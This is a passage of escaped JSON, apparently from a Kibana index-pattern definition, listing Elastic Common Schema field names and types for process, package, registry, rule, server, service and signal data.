"name\":\"package.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.install_scope\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.installed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.command_line\"}}},{\"count\":0,\"name\":\"process.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.executable\"}}},{\"count\":0,\"name\":\"process.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.parent.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.command_line\"}}},{\"count\":0,\"name\":\"process.parent.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.executable\"}}},{\"count\":0,\"name\":\"process.parent.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.name\"}}},{\"count\":0,\"name\":\"process.parent.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.title\"}}},{\"count\":0,\"name\":\"process.parent.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.working_directory\"}}},{\"count\":0,\"name\":\"process.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.title\"}}},{\"count\":0,\"name\":\"process.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.working_directory\"}}},{\"count\":0,\"name\":\"registry.data.bytes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.strings\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.hive\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.key\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.user\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.ruleset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.uuid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.as.organization.name\"}}},{\"count\":0,\"name\":\"server.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.full_name\"}}},{\"count\":0,\"name\":\"server.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.name\"}}},{\"count\":0,\"name\":\"service.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.node.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.state\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.depth\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.index\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\